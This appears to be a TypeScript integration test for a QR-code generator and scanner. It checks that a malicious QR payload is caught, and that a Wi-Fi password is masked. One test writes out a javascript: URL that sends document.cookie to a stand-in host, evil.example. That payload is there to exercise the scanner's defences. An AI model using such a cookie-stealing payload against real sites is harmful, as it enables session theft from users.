// SPDX-License-Identifier: MPL-2.0
/**
 * The whole loop, end to end (plans/162): a code is GENERATED by qr-code,
 * rasterised, DECODED by host.scan (the real zxing-wasm), and CLASSIFIED by
 * scan-code's safety model - the same path a code someone else printed takes
 * through the reader. This is the payoff of owning every half: a malicious
 * payload made into a real QR is caught at the far end.
 *
 * Run with: node --import ./tests/css-stub.mjs --test tests/scan-code-integration.test.ts
 */

import { test } from 'node:test';
import assert from 'node:assert/strict';
import { existsSync } from 'node:fs';
import { readFile } from 'node:fs/promises';
import { fileURLToPath } from 'node:url';
import { dirname, join } from 'node:path';

import { loadTool } from '../engine/src/loader.ts';
import { createRuntime } from '../engine/src/runtime.ts';
import { baseHost } from './helpers/host.ts';
import { createNodeScanAPI } from '../packages/node-shell/src/scan.ts';

const COMMUNITY = join(dirname(fileURLToPath(import.meta.url)), '..', 'community');
let sharp: typeof import('sharp') | null = null;
try { sharp = (await import('sharp')).default; } catch { sharp = null; }
const SKIP = !existsSync(join(COMMUNITY, 'scan-code')) ? 'scan-code not mounted'
  : !sharp ? 'sharp not installed' : false;

const qr: any = SKIP ? null : await loadTool('qr-code', (p: string) => readFile(join(COMMUNITY, p), 'utf8'));
const scanCode: any = SKIP ? null : await loadTool('scan-code', (p: string) => readFile(join(COMMUNITY, p), 'utf8'));
const scan = createNodeScanAPI();

/** Generate a QR carrying `payload`, rasterise it, and decode it for real. */
async function generateAndScan(vals: Record<string, unknown>): Promise<string> {
  const rt = await createRuntime(qr, baseHost(), { color: '#111111', background: '#ffffff', ...vals });
  let svg = rt.getHydratedString('{{{svgContent}}}') as string;
  svg = svg.replace('width="100%" height="100%"', 'width="800" height="800"');
  const { data, info } = await sharp!(Buffer.from(svg), { density: 220 })
    .flatten({ background: '#ffffff' }).ensureAlpha().raw().toBuffer({ resolveWithObject: true });
  const hits = await scan.detect({ data: new Uint8ClampedArray(data.buffer, data.byteOffset, data.length), width: info.width, height: info.height });
  assert.ok(hits.length, 'the generated code did not decode');
  return hits[0].rawValue;
}

/** Run a decoded value through scan-code's classifier (paste mode). */
async function classify(value: string) {
  const rt = await createRuntime(scanCode, baseHost(), { mode: 'paste', paste: value });
  return {
    kind: rt.getHydratedText('{{scanKind}}') as string,
    openUrl: rt.getHydratedText('{{scanOpenUrl}}') as string,
    warnings: rt.getHydratedString('{{{scanWarnHtml}}}') as string,
    fields: rt.getHydratedString('{{{scanFieldsHtml}}}') as string,
  };
}

test('a javascript: URL printed as a real QR is decoded and refused an open affordance', { skip: SKIP }, async () => {
  const decoded = await generateAndScan({ url: 'javascript:fetch("//evil.example/"+document.cookie)' });
  assert.match(decoded, /^javascript:/);
  const c = await classify(decoded);
  assert.equal(c.openUrl, '', 'the reader must not offer to open it');
  assert.match(c.warnings, /run code|never openable/i);
});

test('a Wi-Fi QR printed for real is decoded and its password masked', { skip: SKIP }, async () => {
  const decoded = await generateAndScan({ payload: 'wifi', ssid: 'Cafe', wifiKey: 's3cr3t-pass', wifiSecurity: 'WPA' });
  assert.match(decoded, /^WIFI:/);
  const c = await classify(decoded);
  assert.equal(c.kind, 'wifi');
  assert.match(c.fields, /data-secret="s3cr3t-pass"/, 'real password only behind reveal');
  assert.ok(!/>s3cr3t-pass</.test(c.fields), 'password not shown in the clear');
});
